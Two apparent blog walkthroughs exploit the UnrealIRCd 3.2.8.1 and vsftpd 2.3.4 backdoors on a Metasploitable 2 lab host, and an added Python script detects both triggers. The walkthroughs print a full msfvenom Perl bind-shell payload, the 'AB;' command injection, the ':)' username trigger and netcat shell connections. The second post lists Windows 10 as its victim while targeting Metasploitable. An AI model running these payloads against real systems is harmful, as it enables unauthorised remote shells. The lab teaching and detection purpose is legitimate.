UnrealIRCD 3.2.8.1 Backdoor Command Execution
July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Metasploitable 2
Unreal IRCD 3.2.8.1 contains a backdoor that is triggered by entering AB; upon connecting. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th, 2010.
The following example demonstrates its use on Metasploitable 2 (192.168.1.142).
Generating the Payload
We’re going to generate a Unix bind shell payload with msfvenom (port 4444) and connect to it with Netcat.
root@kali:~$ msfvenom -p cmd/unix/bind_perl --payload-options
root@kali:~$ msfvenom -p cmd/unix/bind_perl LHOST=192.168.1.142
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 240 bytes
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
root@kali:~$
Triggering the Exploit
root@kali:~$ nc -vn 192.168.1.142 6667
(UNKNOWN) [192.168.1.142] 6667 (ircd) open
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
:irc.Metasploitable.LAN 451 AB;perl :You have not registered
Connecting to the Netcat Bind Shell
root@kali:~$ nc -vn 192.168.1.142 4444
(UNKNOWN) [192.168.1.142] 4444 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/etc/unreal#
Tags: backdoors
VSFTPD v2.3.4 Backdoor Command Execution
July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows 10
VSFTPD v2.3.4 contains a backdoor that is triggered by entering anystring:) as the username (no password required). After the backdoor is triggered, the target machine opens a shell on port 6200.
This example demonstrates its use on Metasploitable 2 (192.168.1.142).
Triggering the Backdoor
root@kali:~$ ftp 192.168.1.142
Connected to 192.168.1.142.
220 (vsFTPd 2.3.4)
Name (192.168.1.142:root): 123456:)
331 Please specify the password.
Password: [Enter]
[CTRL+C]
421 Service not available, remote server has closed connection
Connecting to the Shell
root@kali:~$ nc -vn 192.168.1.142 6200
(UNKNOWN) [192.168.1.142] 6200 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/#
Tags: backdoors
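A defender-side check for the two triggers described in the posts above (a line starting with AB; sent to the IRC daemon, and an FTP username containing :) followed by a connection to port 6200), as an added example that is not part of the original posts. The record format, the port sets, the rule names and the sample traffic are assumptions constructed for illustration.

```python
import re

# Trigger strings as described on this page.
IRC_TRIGGER = re.compile(rb"^AB;")                 # UnrealIRCd 3.2.8.1
FTP_TRIGGER = re.compile(rb"^USER\s+.*:\)", re.I)  # vsftpd 2.3.4 username
IRC_PORTS = {6667}           # assumption: ports where the ircd listens
FTP_PORTS = {21}             # assumption: port where vsftpd listens
BACKDOOR_SHELL_PORT = 6200   # vsftpd backdoor shell port, per the page


def scan(records):
    """Return (src, rule) alerts for client-to-server records.

    Each record is (src_ip, dst_port, payload); payload is one protocol
    line as bytes, or None for a new connection that has sent no data yet.
    """
    alerts = []
    ftp_triggered = set()  # sources that already sent a ':)' username
    for src, dst_port, payload in records:
        if payload is None:
            # A connection to 6200 only matters after the FTP trigger was seen.
            if dst_port == BACKDOOR_SHELL_PORT and src in ftp_triggered:
                alerts.append((src, "vsftpd-backdoor-shell-connect"))
            continue
        line = payload.rstrip(b"\r\n")
        if dst_port in IRC_PORTS and IRC_TRIGGER.match(line):
            alerts.append((src, "unrealircd-backdoor-trigger"))
        elif dst_port in FTP_PORTS and FTP_TRIGGER.match(line):
            ftp_triggered.add(src)
            alerts.append((src, "vsftpd-backdoor-trigger"))
    return alerts


# Constructed sample traffic (not captured from a real network).
SAMPLE = [
    ("10.0.0.5", 6667, b"NICK alice\r\n"),
    ("10.0.0.5", 6667, b"PRIVMSG #lab :AB; is just text here\r\n"),
    ("10.0.0.9", 6667, b"AB;id\r\n"),
    ("10.0.0.5", 21, b"USER anonymous\r\n"),
    ("10.0.0.9", 21, b"USER 123456:)\r\n"),
    ("10.0.0.5", 6200, None),   # no prior trigger from this source
    ("10.0.0.9", 6200, None),   # follows the ':)' username above
]

if __name__ == "__main__":
    for src, rule in scan(SAMPLE):
        print(src, rule)
```

The IRC rule is anchored to the start of the line, so ordinary chat text that merely contains AB; is not flagged, and a port 6200 connection is reported only when the same source sent the FTP trigger first.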